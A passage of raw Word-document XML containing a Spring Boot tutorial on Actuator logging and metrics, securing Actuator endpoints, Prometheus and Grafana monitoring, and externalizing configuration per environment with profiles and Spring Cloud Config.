    </w:p>
    <w:p w14:paraId="2239B763"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loggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3D27E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loggers.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142FD78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e /actuator/loggers endpoint will show the current logging levels, and you can programmatically change the logging level at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D1CE2"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of Changing Logger Level via Actuator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F9C9B8"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curl -X POST http://localhost:8080/actuator/loggers/org.springframework.web -d "level=DEBUG"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BC537E"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Use this feature to adjust logging levels dynamically based on real-time conditions or traffic patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDBAC5D"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0C2311">
          <v:rect id="_x0000_i2888" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C705057"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7. Application Metrics with Actuator and Prometheus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC6EA4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With Prometheus integration, you can set up </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to monitor critical application-specific data. Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Timed</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Counted</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotations for custom methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49177DDD"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 of Custom Metric:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254464B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imed(value = "custom_metric", description = "Time taken to process a request")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD8D41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public ResponseEntity&lt;String&gt; processRequest() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584D49C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 Some business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28132AF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    return ResponseEntity.ok("Processed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0263DB8A"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE9EB23"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lastRenderedPageBreak/>
        <w:t>This will create a metric, custom_metric_seconds_count, that Prometheus can scrape and use for scaling and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EE8BC9"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A0017">
          <v:rect id="_x0000_i2889" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45758858"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8. Securing Actuator Endpoints in Production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FC682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 a production environment, you should </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>secure actuator endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> since they expose sensitive information like health, metrics, and more. Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to restrict access to certain endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1634148F"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67055F8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include=health,metrics,info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542DC27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endpoints.web.exposure.exclude=shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8AFB1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security.user.name=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF9EB6"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management.security.user.password=adminpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7808819B"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This configuration restricts access to sensitive actuator endpoints like /actuator/shutdown and enables basic authentication on the /actuator endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7961212C"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2660B">
          <v:rect id="_x0000_i2890" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E429D95"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9. Monitoring and Alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA415B2"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Once your Spring Boot microservices are properly instrumented with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Actuator endpoint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Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can set up </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>alerting</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on metrics like response times, request counts, or error rates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE15330"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ntegrate with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to visualize metrics and set up alerts for abnormal behavior (e.g., when the response time exceeds a threshold).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0841264B" w14:textId="77777777" w:rsidR="00FD7D9D" w:rsidRPr="00FD7D9D" w:rsidRDefault="00000000" w:rsidP="00FD7D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19F38">
          <v:rect id="_x0000_i2891" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4666B428" w14:textId="77777777" w:rsidR="00FD7D9D" w:rsidRPr="00FD7D9D" w:rsidRDefault="00FD7D9D" w:rsidP="00FD7D9D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1A431D"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To utilize </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot Actuators</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> efficiently in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>health metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and microservice operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238D8E8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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Expose health and metrics endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Kubernetes probes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A250A1"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Configure </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom health checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FBD3B4"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Leverage </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for monitoring and auto-scaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F58877"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Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log aggregation</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for centralized monitoring and tracing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E812289"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 xml:space="preserve">Secure sensitive endpoints in production with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B16AB6C" w14:textId="77777777" w:rsidR="00FD7D9D" w:rsidRPr="00FD7D9D" w:rsidRDefault="00FD7D9D" w:rsidP="00FD7D9D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD7D9D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>With these steps, you can manage and monitor your microservices efficiently in a containerized environment, ensuring smooth operations and better fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4964872F"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9674D">
          <v:rect id="_x0000_i2892" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A30319" w14:textId="4BC01AA2" w:rsidR="00187C12" w:rsidRPr="00CE4B95" w:rsidRDefault="00414D65" w:rsidP="00FD7D9D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="700" w:name="_Toc197867914"/>
      <w:r w:rsidRPr="00414D65">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you externalize configuration for microservices specifically for different environments</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="700"/>
    </w:p>
    <w:p w14:paraId="10E6604F" w14:textId="4A8317EF" w:rsidR="000C2889" w:rsidRPr="000C2889" w:rsidRDefault="000C2889" w:rsidP="00607204">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Externalizing configuration in a microservices architecture is crucial for managing different environments (e.g., development, staging, production) without changing the codebase. Spring Boot provides several ways to manage environment-specific configurations efficiently. Below are the best practices and strategies for </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>externalizing configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring Boot microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71095E1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1. Use application.properties / application.yml with Profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6C46D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 Boot allows you to define configurations for different environments by using profiles. You can have different configuration files for each environment and Spring will automatically pick the right one based on the active profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E68AE2"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726AE5B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properties (common properties)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB0F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application.name=my-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9E890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er.port=8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFAD50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dev.properties (for development environment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CAB26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jdbc:mysql://localhost:3306/dev_db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BCD7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dev_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E75840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dev_password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D57C7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prod.properties (for production environment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8B9A1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jdbc:mysql://prod-db-server:3306/prod_db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A31BE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prod_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D71512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prod_password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F42BA15"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Activating Profiles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE96F9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You can activate the profile via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6B34B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mmand-line argument</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2658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java -jar my-app.jar --spring.profiles.active=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488D374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application.properties</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8F16E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profiles.active=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486D9F6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Via environment variable</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3088774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xport SPRING_PROFILES_ACTIVE=prod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5592B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This approach ensures the correct configuration is loaded for each environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB980F"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D8A1C3">
          <v:rect id="_x0000_i2893" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="703535DD"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2. Externalize Configuration with Config Server (Spring Cloud Config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446044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For managing configurations across multiple microservices, Spring Cloud Config provides a centralized way to externalize configuration. It supports Git, SVN, or file system-based repositories for storing configuration properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3F9DFE"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Steps to Set Up Spring Cloud Config Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9CF7D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dd the dependency in the config server application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DC890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6E82E6D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2EDE3F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config&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F45BE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51A863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yml for Config Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E314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er:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F850A6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port: 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DED895B" w14:textId="77777777" w:rsidR="000C2889" w:rsidRPr="000C2889" w:rsidRDefault="000C2889" w:rsidP="000C2889">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CBB43D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3726A2D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ud:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6042D99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fig:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA35A5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erver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CE851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git:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D3AA9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s://github.com/your-org/config-repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0443BB99"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ne-on-start: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358089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Git repository structure</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Store your environment-specific properties in a Git repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1AED0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yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6703ADB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dev.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132BF13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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2889">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> application-prod.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D28E0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Microservice Configuration</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Microservices can fetch configuration from the config server via bootstrap.yml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039E4B8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6AC33B8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application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECE7AB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3246707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loud:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5355184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fig:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0290A16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localhost:8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018D995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ccessing Configuration</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The microservices will automatically pull configuration from the Config Server based on the active profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30401757"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2A5EF">
          <v:rect id="_x0000_i2894" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CC3DB1"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3. Environment Variables for External Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276774E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For cloud-based environments or Docker containers, environment variables are commonly used to override default configurations, especially sensitive data like database passwords or API keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FB6EB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Example:</w:t>
      </w:r>
    </w:p>
